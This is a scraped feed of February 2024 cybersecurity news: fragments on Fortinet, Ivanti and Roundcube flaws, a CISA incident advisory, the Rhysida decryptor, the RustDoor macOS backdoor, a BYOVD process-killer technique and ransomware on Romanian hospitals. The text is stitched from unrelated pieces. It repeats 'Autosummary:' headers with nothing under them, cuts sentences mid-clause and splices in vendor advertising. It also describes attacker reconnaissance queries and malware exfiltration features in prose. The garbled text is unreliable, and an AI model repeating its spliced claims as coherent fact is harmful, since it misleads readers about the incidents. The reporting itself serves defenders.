Abusing the Ubuntu ‘command-not-found’ utility to install malicious packages Pierluigi Paganini February 14, 2024 February 14, 2024 Researchers reported that attackers can exploit the ‘command-not-found’ utility to trick users into installing rogue packages on Ubuntu systems. "Autosummary:
As such, a typical digital forensics report: provides background information on the case, defines the scope of the investigation together with its objectives and limitations, describes the methods and techniques used, details the process of acquiring and preserving digital evidence, presents the results of the analysis, including discovered artifacts, timelines, and patterns, summarizes the findings and their significance in relation to the goals of the investigation Lest we forget: the report needs to adhere to legal standards and requirements so that it can withstand legal scrutiny and serve as a crucial document in legal proceedings. With that in mind, digital forensics has a role to play in various contexts, including crime investigations, incident response, divorce and other legal proceedings, employee misconduct probes, counterterrorism efforts, fraud detection and data recovery. This art of uncovering, analyzing and interpreting digital evidence has seen substantial growth particularly in investigations involving various kinds of fraud and cybercrime, tax evasion, stalking, child exploitation, intellectual property theft, and even terrorism. "The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) conducted an incident response assessment of a state government organization’s network environment after documents containing host and user information, including metadata, were posted on a dark web brokerage site. Analysis confirmed that an unidentified threat actor compromised network administrator credentials through the account of a former employee—a technique commonly leveraged by threat actors—to successfully authenticate to an internal virtual private network (VPN) access point, further navigate the victim’s on-premises environment, and execute various lightweight directory access protocol (LDAP) queries against a domain controller.[1] Analysis also focused on the victim’s Azure environment, which hosts sensitive systems and data, as well as the compromised on-premises environment. Analysis determined there were no indications the threat actor further compromised the organization by moving laterally from the on-premises environment to the Azure environment.
CISA and MS-ISAC are releasing this Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) used by the threat actor and methods to protect against similar exploitation of both unnecessary and privileged accounts.
Download the PDF version of this report:
Autosummary:
Analysis confirmed that an unidentified threat actor compromised network administrator credentials through the account of a former employee—a technique commonly leveraged by threat actors—to successfully authenticate to an internal virtual private network (VPN) access point, further navigate the victim’s on-premises environment, and execute various lightweight directory access protocol (LDAP) queries against a domain controller.[1] Analysis also focused on the victim’s Azure environment, which hosts sensitive systems and data, as well as the compromised on-premises environment.Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or MS-ISAC. Table 1: LDAP Queries Conducted by the Threat Actor Query Description LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Person,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local) Collects names and metadata of users in the domain.LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Trusted-Domain,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local) Collects trust information in the domain.LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Computer,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local) Collects names and metadata of hosts in the domain. in the Azure tenant to restrict potentially harmful permissions including: Create a Forensically Ready Organization Collect access- and security-focused logs (e.g., intrusion detection systems/intrusion prevention systems, firewall, data loss prevention, and virtual private network) for use in both detection and incident response activitiesCISA and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document.Conditional access policies also account for common signals, such as user or group memberships, IP location information, device, application, and risky sign-in behavior identified through integration with Azure AD Identity Protection.SUMMARY The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) conducted an incident response assessment of a state government organization’s network environment after documents containing host and user information, including metadata, were posted on a dark web brokerage site. Untitled Goose Tool Incident responders collected Azure and Microsoft Defender for Endpoint (MDE) logs using CISA’s Untitled Goose Tool—a free tool to help network defenders detect potentially malicious activity in Microsoft Azure, Azure Active Directory (AAD), and Microsoft 365 (M365) environments.Threat actors commonly leverage valid accounts, including accounts of former employees that have not been properly removed from the Active Directory (AD), to gain access to organizations.[1] CISA and MS-ISAC assessed that an unidentified threat actor likely accessed documents containing host and user information to post on the dark web for profit after gaining access through the account of a former employee.Users without administrative privileges cannot change settings, however, they can view user info, group info, device details, and user privileges. "In this Help Net Security video, Andrew Costis, Chapter Lead of the Adversary Research Team at AttackIQ, discusses how purple teaming allows security teams to break down barriers between teams and increase operational effectiveness. It’s no longer about team red vs. team blue. It’s time to think about team purple. This security force blends offensive and defensive minds, blurring lines and boosting defenses. No more adversarial silos, just collaborative cycles and shared intel. Imagine red … More
The post How purple teaming enhances inter-team collaboration and effectiveness in cybersecurity appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security interview, Mick Baccio, Staff Security Strategist at Splunk SURGe, discusses the future of cybersecurity, emphasizing the importance of data analytics and automation in addressing evolving threats. He points out the changes in threat tactics, the significance of automation in reducing human error, challenges in implementing data analytics, and envisions a future where AI-assistants transform cybersecurity operations. How have cybersecurity threats evolved in recent years, and what role do data analytics … More
The post The future of cybersecurity: Anticipating changes with data analytics and automation appeared first on Help Net Security.
"Autosummary:
The landscape of cyber threats continues to further evolve, and recent high-profile data breaches (MoveIT, accelion, goanywhere, etc.) underscore the gravity of the shift. For instance, complex multi-step incident response workflows, such as quarantining a host, blocking an indicator, and searching for additional compromised assets, can be automated to minimize the likelihood of costly oversights or missed steps.In this Help Net Security interview, Mick Baccio, Staff Security Strategist at Splunk SURGe, discusses the future of cybersecurity, emphasizing the importance of data analytics and automation in addressing evolving threats. "Autosummary:
CVE-2024-21893, which was disclosed by Ivanti late last month alongside CVE-2024-21888, refers to a server-side request forgery (SSRF) vulnerability in the SAML module that, if successfully exploited, could permit access to otherwise restricted resources sans any authentication. "CVE-2023-43770, a vulnerability in the Roundcube webmail software that has been fixed in September 2023, is being exploited by attackers in the wild, CISA has warned by adding the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. About CVE-2023-43770 Roundcube is an open-source, browser-based IMAP client with an application-like user interface. CVE-2023-43770 is a vulnerability that allows attackers to mount cross-site scripting (XSS) attacks through specially crafted links in plain text email messages. The vulnerability … More
The post Roundcube webmail XSS vulnerability exploited by attackers (CVE-2023-43770) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
A SaaS Security Posture Management (SSPM) platform like AppOmni can help with detecting and alerting on: Initial Access: Out-of-the-box rules to detect credential compromise, including password spraying, brute force attacks, and unenforced MFA policies Out-of-the-box rules to detect credential compromise, including password spraying, brute force attacks, and unenforced MFA policies Persistence : Scan and identify OAuth permissions and detect OAuth hijacking : Recreation of illustration by Amitai Cohen Cloudflare-Atlassian Breach On Thanksgiving Day, November 23, 2023, Cloudflare"s Atlassian systems were also compromised by a nation-state attack. "Autosummary:
Phishing email spreading Bumblebee Source: Proofpoint The emails contain a OneDrive URL that downloads a Word document named "ReleaseEvans#96.docm" or something similar, with a lure pretending to be from consumer electronics company hu.ma.ne, known for its AI-powered pin. "Autosummary:
Remote Monitoring & Management (RMM) software, including popular tools like AnyDesk, Atera, and Splashtop, are invaluable for IT administrators today, streamlining tasks and ensuring network integrity from afar. Try ThreatDown bundles today For IT teams plagued by the triad of complex deployment, scattered tooling, and excessive alert noise, ThreatDown bundles emerge as a superior solution that caters to the needs of today’s security teams. "Autosummary:
In this case it appears that attackers can send plain text emails to Roundcube users with XSS links in them, but Roundcube does not sanitize the links, and, of course, stores the email, creating persistence. "Autosummary:
"Autosummary:
Other vendors later linked CVE-2023-38831 exploitation to multiple government-backed hacking groups, including the Sandworm, APT28, APT40, DarkPink (NSFOCUS), and Konni (Knownsec) threat groups from Russia, China, and North Korea. "Autosummary:
"Autosummary:
The number of bugs in each vulnerability category is listed below: 16 Elevation of Privilege Vulnerabilities 3 Security Feature Bypass Vulnerabilities 30 Remote Code Execution Vulnerabilities 5 Information Disclosure Vulnerabilities 9 Denial of Service Vulnerabilities 10 Spoofing Vulnerabilities The total count of 73 flaws does not include 6 Microsoft Edge flaws fixed on February 8th and 1 Mariner flaw. "Ensuring platform security is hard, but when a company the stature of Apple begins to ramp up protection of its ecosystem, every IT decision maker should pay attention. Unfortunately, this is precisely what"s happening: Apple is now updating fundamental protection at a faster clip than it"s ever done before.
That important revelation comes from Howard Oakley at the excellent Eclectic Light Company blog. He notes that in the six weeks ending Feb. 9 Apple, has updated a Mac security feature called XProtect five times — introducing 11 new rules to the service.
Autosummary:
Logically, good security practice also extends to the other common-sense risk-avoidance techniques: avoid clicking links you don’t trust, don’t open messages you don’t recognize, update system software frequently, never use the same password twice, and so forth.(It should) To ensure your Mac is installing these XProtect updates, follow these steps: In macOS Ventura or later, open System Settings>General, open Software Update and click the info button beside Automatic Updates. He also advises that Mac users should never use torrented, cracked, or fake software, and that if they don’t trust the security and authenticity of any third-party software they should delete it. "On February 2024 Patch Tuesday, Microsoft has delivered fixes for 72 CVE-numbered vulnerabilities, including two zero-days (CVE-2024-21412, CVE-2024-21351) that are being leveraged by attackers in the wild. About CVE-2024-21412 and CVE-2024-21351 CVE-2024-21412 allows attackers to bypass the Microsoft Defender SmartScreen security feature with booby-trapped Internet Shortcut files. In late December 2023, Trend Micro researcher Peter Girnus and his colleagues in the ZDI Threat Hunting team discovered the Water Hydra APT leveraging the flaw to infect … More
The post Microsoft patches two zero-days exploited by attackers (CVE-2024-21412, CVE-2024-21351) appeared first on Help Net Security.
"Autosummary:
The researchers created a proof-of-concept (PoC) for further testing, and discovered that the initial shortcut bypassed the patch for CVE-2023-36025 and evaded SmartScreen protections, “which failed to properly apply Mark-of-the-Web (MotW), a critical Windows component that alerts users when opening or running files from an untrusted source.” "Autosummary:
According to the financial institution, exposed data may include first and last name, address, business email address, date of birth, Social Security number, and other account information. "Autosummary:
"Autosummary:
"Autosummary:
Stopping it will remove the evidence stored in the volatile memory (RAM) Collect and keep all relevant log information, from the affected equipment, but also from network equipment, firewall Examine the system logs to identify the mechanism by which IT infrastructure has been compromised Immediately inform all employees and notify affected customers and business partners of the incident and its extent Restore affected systems based on data backups after a full system cleanup has been performed . "Autosummary:
Indicators of Compromise Phishing domains uk-barclaysliveteam[.]com barclaysbusinesslivechat[.]com boi-bb-onlineservice[.]com santanderbusiness-helpcentre[.]com Try ThreatDown bundles today For IT teams plagued by the triad of complex deployment, scattered tooling, and excessive alert noise, ThreatDown bundles emerge as a superior solution that caters to the needs of today’s security teams.Remote Monitoring & Management (RMM) software, including popular tools like AnyDesk, Atera, and Splashtop, are invaluable for IT administrators today, streamlining tasks and ensuring network integrity from afar. "As we enter 2024, ransomware remains the most significant cyberthreat facing businesses, according to Malwarebytes. Malwarebytes reveals that the United States accounted for almost half of all ransomware attacks in 2023. “Small and medium-sized organizations face a deluge of cyber threats daily including ransomware, malware and phishing attacks. This new data spotlights the pervasive cat-and-mouse game between cybercriminals and the security and IT teams on the front lines,” said Mark Stockley, Cybersecurity Evangelist, Malwarebytes ThreatDown … More
The post Ransomware tactics evolve, become scrappier appeared first on Help Net Security.
"Autosummary:
The repeated use of zero-days also signaled a new level of sophistication making CL0P the second most active “big game” ransomware group of 2023, outpacing rivals that were active in every month of the year compared to just a few weeks of activity from CL0P. Lockbit also remained the most widely used ransomware-as-a-service, which accounted for more than twice as many attacks as its nearest competitor in 2023. "SiCat is an open-source tool for exploit research designed to source and compile information about exploits from open channels and internal databases. Its primary aim is to assist in cybersecurity, enabling users to search the internet for potential vulnerabilities and corresponding exploits. Akas Wisnu Aji, the creator of SiCat, outlined the key features of the tool: Performing exploit searches based on desired inputs and sources such as Exploit-DB, Exploit Alert, Packetstorm Security, NVD Database, and … More
The post SiCat: Open-source exploit finder appeared first on Help Net Security.
"Autosummary:
"2024 is expected to witness a surge in cyberattacks driven by global events and the widespread accessibility of advanced technologies. In this Help Net Security round-up, we present segments from previously recorded videos where cybersecurity experts discuss predictions for 2024, providing a comprehensive perspective on the challenges and opportunities awaiting organizations. Complete videos Dara Gibson, Senior Cyber Insurance Manager at Optiv, discusses cyber insurance and what we should expect to see in 2024. Fei Huang, … More
The post 2024 cybersecurity outlook: A wave of global threats on the horizon appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Palo Alto Networks Unit 42, in its own analysis of ransomware gangs" public listings of victims on dark web sites, called out manufacturing as the most impacted industry vertical in 2023, followed by profession and legal services, high technology, retail, construction, and healthcare sectors. Besides a notable shift to big game hunting, which refers to the tactic of targeting very large companies to extract hefty ransoms, ransom payments are being steadily routed through cross-chain bridges, instant exchangers, and gambling services, indicating that e-crime groups are slowly moving away from centralized exchanges and mixers in pursuit of new avenues for money laundering. "Autosummary:
"In this Help Net Security interview, Yaron Edan, CISO at REE Automotive, discusses the cybersecurity landscape of the automotive industry, mainly focusing on electric and connected vehicles. Edan highlights the challenges of technological advancements and outlines strategies for automakers to address cyber threats effectively. Additionally, he emphasizes the importance of consumer awareness in ensuring vehicle security. Can you describe the state of cybersecurity in the automotive industry, especially in the context of electric and connected … More
The post Integrating cybersecurity into vehicle design and manufacturing appeared first on Help Net Security.
"Autosummary:
Now that our vehicles are becoming increasingly connected to the internet can go through Over-the-Air (OTA) updates, use remote management, contain Advanced Driver Assistance Systems (ADAS), and employ AI, the potential avenues for cyberattacks have expanded for threat actors to exploit in a significant way. Once an automaker is compliant with certain regulatory rules, they will then ask the regulatory bodies to come to conduct an onsite visit, where they conduct an audit for months at a time, trying to hack each layer they can and look for any areas of weakness, to identify what needs to be patched up.In this Help Net Security interview, Yaron Edan, CISO at REE Automotive, discusses the cybersecurity landscape of the automotive industry, mainly focusing on electric and connected vehicles. Implement strong network security measures, including firewalls, detection systems, and encryption, to monitor your network traffic for any anomalies regularly. "Autosummary:
"Autosummary:
Trestioreanu" Institute Bucharest (IOB) Military Emergency Hospital "Dr. Alexandru Gafencu" Constanta Sighetu Marmației Municipal Hospital Targoviste Emergency County Hospital C.F. Clinical Hospital no. 2 Bucharest Fundeni Clinical Institute Iasi Regional Institute of Oncology (IRO Iasi) Buzău County Emergency Hospital Slobozia County Emergency Hospital Institute of Cardiovascular Diseases Timișoara Hospital for Chronic Diseases Sf. "Files encrypted by Rhysida ransomware can be successfully decrypted, due to a implementation vulnerability discovered by Korean researchers and leveraged to create a decryptor. Rhysida and its ransomware Rhysida is a relatively new ransomware-as-a-service gang that engages in double extortion. First observed in May 2023, it made its name by attacking the British Library, the Chilean Army, healthcare delivery organizations, and Holding Slovenske Elektrarne (HSE). According to Check Point Research, the Rhysida ransomware group may … More
The post Decryptor for Rhysida ransomware is available! appeared first on Help Net Security.
"Autosummary:
"Autosummary:
ExpressVPN leaked DNS requests due to a bug in the split tunneling feature Pierluigi Paganini February 12, 2024 February 12, 2024 A bug in the split tunneling feature implemented in ExpressVPN exposed the domains visited by the users. "Autosummary:
The updates that fix the problem are Ivanti Connect Secure versions 9.1R14.4, 9.1R17.2, 9.1R18.3, 22.4R2.2, 22.5R1.1 and 22.5R2.2, Ivanti Policy Secure version 22.5R1.1, and ZTA version 22.6R1.3. "Autosummary:
South Korean researchers, including employees of the Korean Internet & Security Agency (KISA), examining Rhysida found an implementation vulnerability in the ransomware"s encryption scheme, specifically, the random number generator (CSPRNG) that helps generate the unique private (encryption) key in each attack. "Autosummary:
Apostol Andrei" Emergency County Clinical Hospital Constanta Pitești County Emergency Hospital Military Emergency Hospital "Dr. Alexandru Gafencu" Constanta Institute of Cardiovascular Diseases Timișoara Emergency County Hospital "Dr. Constantin Opriș" Baia Mare Sighetu Marmației Municipal Hospital Târgoviște County Emergency Hospital Colțea Clinical Hospital Medgidia Municipal Hospital Fundeni Clinical Institute Oncological Institute "Prof. Dr. Al. "Bugcrowd has secured $102 million in strategic growth funding to scale its AI-powered crowdsourced security platform offerings globally. Led by General Catalyst, with participation from longtime existing investors Rally Ventures and Costanoa Ventures, this funding round underscores investor confidence in the company’s leadership position in the crowdsourced security market. The additional capital enables Bugcrowd to accelerate growth across EMEA, APAC, and the United States, fund continued innovation into the Bugcrowd Platform, and leverage opportunities for … More
The post Bugcrowd raises $102 million to boost AI-powered crowdsourced security platform appeared first on Help Net Security.
"Autosummary:
With this new funding, Bugcrowd will have the ability to further scale up their platform, expand their global network of hackers, and deliver more value to their customers and the security community at large,” said David Fairman, Netskope APAC Chief Information Officer & Chief Security Officer and Bugcrowd Advisory Board Member “Since its inception, Bugcrowd has delivered innovative solutions with a tangible and meaningful impact on enhancing cyber safety and we have had the privilege of being involved since the early days. The additional capital enables Bugcrowd to accelerate growth across EMEA, APAC, and the United States, fund continued innovation into the Bugcrowd Platform, and leverage opportunities for strategic M&A, providing added value to clients, partners, and the hacker community. "Autosummary:
" Using these observations as reference points, the researchers said they were able to retrieve the initial seed for decrypting the ransomware, determine the "randomized" order in which the files were encrypted, and ultimately recover the data without having to pay a ransom. "Autosummary:
Internet-exposed Roundcube servers (Shodan) Another Roundcube flaw, a stored cross-site scripting (XSS) vulnerability tracked as CVE-2023-5631, was targeted as a zero-day by the Winter Vivern (aka TA473) "Autosummary:
Known ransomware attacks by gang, January 2024 Known ransomware attacks by country, January 2024 Known ransomware attacks by industry sector, January 2024 In other January news, the UK’s National Cybersecurity Centre (NCSC) released a report suggesting that AI will boost ransomware attack volume and severity in the next two years, particularly through lowering the entry barrier for novice hackers.ThreatDown’s select bundles offer: ThreatDown EDR detecting LockBit ransomware ThreatDown automatically quarantining LockBit ransomware For resource-constrained organizations, select ThreatDown bundles offer Managed Detection and Response (MDR) services, providing expert monitoring and swift threat response to ransomware threats—without the need for large in-house cybersecurity teams.AI may introduce new methods and techniques for cybercriminals, to be sure, but the core principles of ransomware gangs—based on access, leverage, and profit—will likely continue unchanged for the foreseeable future. "Autosummary:
In 2024, the modern cyberattack is a segmented, prolonged, and professional effort, in which specialists create strictly financial alliances to plant malware on unsuspecting employees, steal corporate credentials, slip into business networks, and, for a period of days if not weeks, simply sit and watch and test and prod, escalating their privileges while refraining from installing any noisy hacking tools that could be flagged by detection-based antivirus scans. "Fortinet has patched critical remote code execution vulnerabilities in FortiOS (CVE-2024-21762, CVE-2024-23313), one of which is “potentially” being exploited in the wild. The exploitation-in-the-wild has been confirmed by CISA, by adding it to its Known Exploited Vulnerabilities (KEV) catalog, though details about the attacks are still undisclosed. About the vulnerabilities (CVE-2024-21762, CVE-2024-23313) CVE-2024-21762 is an out-of-bounds write vulnerability in FortiOS, which may allow a remote unauthenticated attacker to execute arbitrary code or command via specially … More
The post Critical Fortinet FortiOS flaw exploited in the wild (CVE-2024-21762) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
CISA adds Roundcube Webmail Persistent XSS bug to its Known Exploited Vulnerabilities catalog Pierluigi Paganini February 12, 2024 February 12, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Roundcube Webmail Persistent Cross-Site Scripting (XSS) Vulnerability to its Known Exploited Vulnerabilities catalog. "Autosummary:
"Autosummary:
"Autosummary:
The updated data breach reporting rules aim to ensure that "providers of telecommunications, interconnected Voice over Internet Protocol (VoIP), and telecommunications relay services (TRS) are held accountable in their obligations to safeguard sensitive customer information, and to provide customers with the tools needed to protect themselves in the event that their data is compromised. "Autosummary:
Affected hospitals include: Azuga Orthopaedics and Traumatology Hospital Băicoi City Hospital Buzău County Emergency Hospital C.F. Clinical Hospital no. 2 Bucharest Colțea Clinical Hospital Emergency County Hospital “Dr. Constantin Opriș” Baia Mare Emergency Hospital for Plastic, Reconstructive and Burn Surgery Bucharest Fundeni Clinical Institute Hospital for Chronic Diseases Sf. "Autosummary:
The ransomware gang hit organizations in multiple industries, including the education, healthcare, manufacturing, information technology, and government sectors.Researchers released a free decryption tool for the Rhysida Ransomware Pierluigi Paganini February 12, 2024 February 12, 2024 Researchers discovered a vulnerability in the code of the Rhysida ransomware that allowed them to develop a decryption tool. "Autosummary:
Luca C.F. Clinical Hospital no. 2 Bucharest Medical Centre MALP SRL Moinești Institute of Phonoaudiology and ENT Functional Surgery "Prof. Dr. D. Hociotă", Bucharest, Romania Brad Pneumonology Sanatorium, Hunedoara Hospital of Pneumonology Rosiorii de Vede Băicoi City Hospital Sante Clinic Calarasi Back to paper Since the systems were taken offline or shut down, doctors have been forced to return to writing prescriptions and keeping records on paper. "Autosummary:
"Most of the affected hospitals have backups of data on the affected servers, with data saved relatively recently (1-2-3 days ago) except one, whose data was saved 12 days ago," DNSC said. "Autosummary:
The bug was introduced in ExpressVPN Windows versions 12.23.1 – 12.72.0, published between May 19, 2022, and Feb. 7, 2024, and only affected those using the split tunneling feature. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: How CISOs navigate policies and access across enterprises In this Help Net Security interview, Marco Eggerling, Global CISO at Check Point, discusses the challenge of balancing data protection with diverse policies, devices, and access controls in a distributed enterprise. Enhancing adversary simulations: Learn the business to attack the business In this Help Net Security interview, Jamieson O’Reilly, Founder of DVULN, … More
The post Week in review: 10 must-read cybersecurity books, AnyDesk hack, Patch Tuesday forecast appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: How CISOs navigate policies and access across enterprises In this Help Net Security interview, Marco Eggerling, Global CISO at Check Point, discusses the challenge of balancing data protection with diverse policies, devices, and access controls in a distributed enterprise. Prowler: Open-source security tool for AWS, Google Cloud Platform, Azure Prowler is an open-source security tool designed to assess, audit, and enhance the security of AWS, GCP, and Azure. "Autosummary:
Raspberry Robin spotted using two new 1-day LPE exploits Pierluigi Paganini February 11, 2024 February 11, 2024 Raspberry Robin continues to evolve, it was spotted using two new one-day exploits for vulnerabilities either Discord to host samples. The researchers conclude that Raspberry Robin operators have purchased the 1-day exploits from an exploit developer for the following reasons: “The exploits are used as an external 64-bit executable. "Autosummary:
"Autosummary:
"Autosummary:
Disclosure and exploitation timelines (Check Point) Specifically, regarding CVE-2023-36802, which enables attackers to escalate their privileges to the SYSTEM level, Cyfirma reported that an exploit had been available for purchase on the Dark Web since February 2023, a full seven months before Microsoft acknowledged and addressed the issue. It has been associated with threat actors like EvilCorp, FIN11, TA505, the Clop ransomware gang, and other malware operations, but its creators and maintainers are unknown. "Autosummary:
7.6 Not affected Not Applicable FortiOS 7.4 7.4.0 through 7.4.2 Upgrade to 7.4.3 or above FortiOS 7.2 7.2.0 through 7.2.6 Upgrade to 7.2.7 or above FortiOS 7.0 7.0.0 through 7.0.13 Upgrade to 7.0.14 or above FortiOS 6.4 6.4.0 through 6.4.14 Upgrade to 6.4.15 or above FortiOS 6.2 6.2.0 through 6.2.15 Upgrade to 6.2.16 or above FortiOS 6.0 6.0 all versions Migrate to a fixed release According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. "Autosummary:
macOS Backdoor RustDoor likely linked to Alphv/BlackCat ransomware operations Pierluigi Paganini February 10, 2024 February 10, 2024 Bitdefender Researchers linked a new macOS backdoor, named RustDoor, to the Black Basta and Alphv/BlackCat ransomware operations. "Autosummary:
"Autosummary:
The macOS backdoor is delivered under multiple names, including "zshrc2," "Previewers," "VisualStudioUpdater," "VisualStudioUpdater_Patch," "VisualStudioUpdating," "visualstudioupdate," and "DO_NOT_RUN_ChromeUpdates". : Pauses execution for a set time, possibly to evade detection or synchronize actions. upload : Sends files to a remote server, used for exfiltrating stolen data. After infecting a system, the malware communicates with command and control (C2) servers using specific endpoints for registration, task execution, and data exfiltration. "Autosummary:
Our integrated solutions combine EP, VPM, and EDR technologies, tailored to your organization’s specific needs, including: ThreatDown EDR detecting LockBit ransomware ThreatDown automatically quarantining LockBit ransomware For resource-constrained organizations, select ThreatDown bundles offer Managed Detection and Response (MDR) services, providing expert monitoring and swift threat response to ransomware attacks—without the need for large in-house cybersecurity teams. Global ransomware attacks by month, 2022 vs 2023 Global ransomware attacks, 2022 vs 2023 Additionally, LockBit was responsible for a 22% of all ransomware attacks in 2023, over half as much as the next top five gangs combined. "Autosummary:
A patch is available now for Ivanti Connect Secure (versions 9.1R14.5, 9.1R17.3, 9.1R18.4, 22.4R2.3, 22.5R1.2, 22.5R2.3 and 22.6R2.2), Ivanti Policy Secure (versions 9.1R17.3, 9.1R18.4 and 22.5R1.2) and ZTA gateways (versions 22.5R1.6, 22.6R1.5 and 22.6R1.7). "Autosummary:
"January 2024 Patch Tuesday is behind us. A relatively light release from Microsoft with 39 CVEs addressed in Windows 10, 35 in Windows 11, and surprisingly no zero-day vulnerabilities from Microsoft to start the new year. January’s release was a bit unusual in that we didn’t have any updates for Office 2013 and Office 2016, only the online, click-to-run versions had a single-CVE update. That lull didn’t last long as the zero-day treadmill has started … More
The post February 2024 Patch Tuesday forecast: Zero days are back and a new server too appeared first on Help Net Security.
"Autosummary:
Apple, Google, Ivanti, and Microsoft The first zero-day announcements and some software releases from Apple, Google, Ivanti, and Microsoft have hit the streets.Hot features include an option to subscribe as needed through Azure Arc (which is also getting an update), some Active Directory storage and security updates, communications security updates with SMB over Quick UDP (QUIC), and hotpatching. January’s release was a bit unusual in that we didn’t have any updates for Office 2013 and Office 2016, only the online, click-to-run versions had a single-CVE update. "97% of office workers across the UK and US trust their cybersecurity team’s ability to prevent or minimize damage from cyberattacks, according to CybSafe. The study examining attitudes towards cybersecurity teams within organizations has uncovered that despite minor issues around communication and processes, there are high levels of trust and appreciation amongst employees. It indicates how cybersecurity teams and professionals are increasingly viewed as a vital strategic function enabling both individuals and business success. The … More
The post Cybersecurity teams recognized as key enablers of business goals appeared first on Help Net Security.
"Autosummary:
Positive impact of security teams on business goals When it comes to the impact of security teams on business success, 74% believe security teams enable business goals as well as personal work objectives (77%), with just 7% of respondents stating their cybersecurity team has had an overall negative impact on their working experience.Interestingly, the research suggests that while, ultimately, security teams are responsible for the maintenance of a positive security culture, workers feel a sense of responsibility for protecting their employer’s data. "Autosummary:
Attributed to a threat actor named Storm-0856 (previously DEV-0856), it"s propagated via several entry vectors, including infected USB drives, with Microsoft describing it as part of a "complex and interconnected malware ecosystem" with ties to other e-crime groups like Evil Corp, Silence, and TA505. "Autosummary:
"Once installed, these devices transform into operational nodes within their illicit streaming media platform, catering to services like traffic proxying, DDoS attacks, OTT content provision, and pirate traffic," QiAnXin researchers said. "Autosummary:
The malicious dynamic-link library, named "libcef.dll," is side-loaded by means of a legitimate executable named "obs-browser-page.exe," which is also included in the Node.js project. "Autosummary:
FortiOS 7.4 (versions 7.4.0 through 7.4.2) - Upgrade to 7.4.3 or above FortiOS 7.2 (versions 7.2.0 through 7.2.6) - Upgrade to 7.2.7 or above FortiOS 7.0 (versions 7.0.0 through 7.0.13) - Upgrade to 7.0.14 or above FortiOS 6.4 (versions 6.4.0 through 6.4.14) - Upgrade to 6.4.15 or above FortiOS 6.2 (versions 6.2.0 through 6.2.15) - Upgrade to 6.2.16 or above FortiOS 6.0 (versions 6.0 all versions) - Migrate to a fixed release The development comes as Fortinet issued patches for CVE-2024-23108 and CVE-2024-23109, impacting FortiSIEM supervisor, allowing a remote unauthenticated attacker to execute unauthorized commands via crafted API requests. "Autosummary:
The rise of cloud computing Cloud computing deploys services, including servers, storage, software, databases, networking, and intelligence over the Internet "the cloud" to offer flexible resources, faster innovation, and cost efficiencies.We will also delve into how Wazuh, a cybersecurity solution supporting cloud platforms like Amazon Web Services (AWS), Microsoft Azure, Github, and Google Cloud Platform (GCP), can help address these challenges effectively. Challenges of cloud computing While cloud computing offers numerous benefits, such as cost savings, increased efficiency, and seamless collaboration, it also introduces unique cybersecurity challenges.Wazuh systematically examines monitored endpoints, verifying adherence to PCI-DSS, HIPAA, NIST, TSC, CIS, and other applicable regulations.It offers flexibility in integrating with various cloud solution providers, including Amazon Web Services, Microsoft Azure, and Google Cloud, while delivering comprehensive visibility and robust security capabilities. "Autosummary:
"Autosummary:
but I’m unsure if it is exploitable or not 🙂 This analysis and other interesting posts are available here: https://antonioparata.blogspot.com/2024/02/exploiting-vulnerable-minifilter-driver.html About the author: Antonio Parata, Principal Security Researcher at CrowdStrike Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, BYOVD)Exploiting a vulnerable Minifilter Driver to create a process killer Pierluigi Paganini February 09, 2024 February 09, 2024 Researcher demonstrated how to exploit a signed Minifilter Driver in a BYOVD attack to terminate a specific process from the kernel. When our process will exit, the PsSetCreateProcessNotifyRoutine notification callback will be called, the PID check will be satisfied by verifying that the variable it_s_a_me is equals to the process ID that is exiting, triggering the ZwTerminateProcess on the process_handle_to_terminate process. "Autosummary:
The crooks provided Bleeping Computer with evidence of the data breach, it seems that the gang stole data from various departments, including legal, sales, and human resources. "Autosummary:
Fortinet warns of a new actively exploited RCE flaw in FortiOS SSL VPN Pierluigi Paganini February 09, 2024 February 09, 2024 Fortinet warns that the recently discovered critical remote code execution flaw in FortiOS SSL VPN, tracked CVE-2024-21762, is being actively exploited. "Autosummary:
While the original flaw, CVE-2023-34992, was fixed in a previous FortiSIEM release, the new variants will be fixed or have been fixed in the following versions: FortiSIEM version 7.1.2 or above Upcoming FortiSIEM version 7.2.0 or above Upcoming FortiSIEM version 7.0.3 or above Upcoming FortiSIEM version 6.7.9 or above Upcoming FortiSIEM version 6.6.5 or above Upcoming FortiSIEM version 6.5.3 or above Upcoming FortiSIEM version 6.4.4 or above As this is a critical flaw, it is strongly advised that you upgrade to one of the above FortiSIEM versions as soon as they become available. "Autosummary:
The company said the exposure includes names, dates of birth, insurer details, social security numbers, marital status, civil status, and guarantees open to third-party payment. "Autosummary:
While it is not known what data was stolen, the folder names indicate its related to various departments at the company, including legal, sales, human resources, accounting, IT, and management. "Autosummary:
"Autosummary:
XLoader, aka MoqHao, is an Android malware operated and likely created by a financially motivated threat actor named "Roaming Mantis," previously seen targeting users in the U.S., U.K., Germany, France, Japan, South Korea, and Taiwan. The pop-up messages used in this step are available in English, Korean, French, Japanese, German, and Hindi, which indicates XLoader"s current targets. "Autosummary:
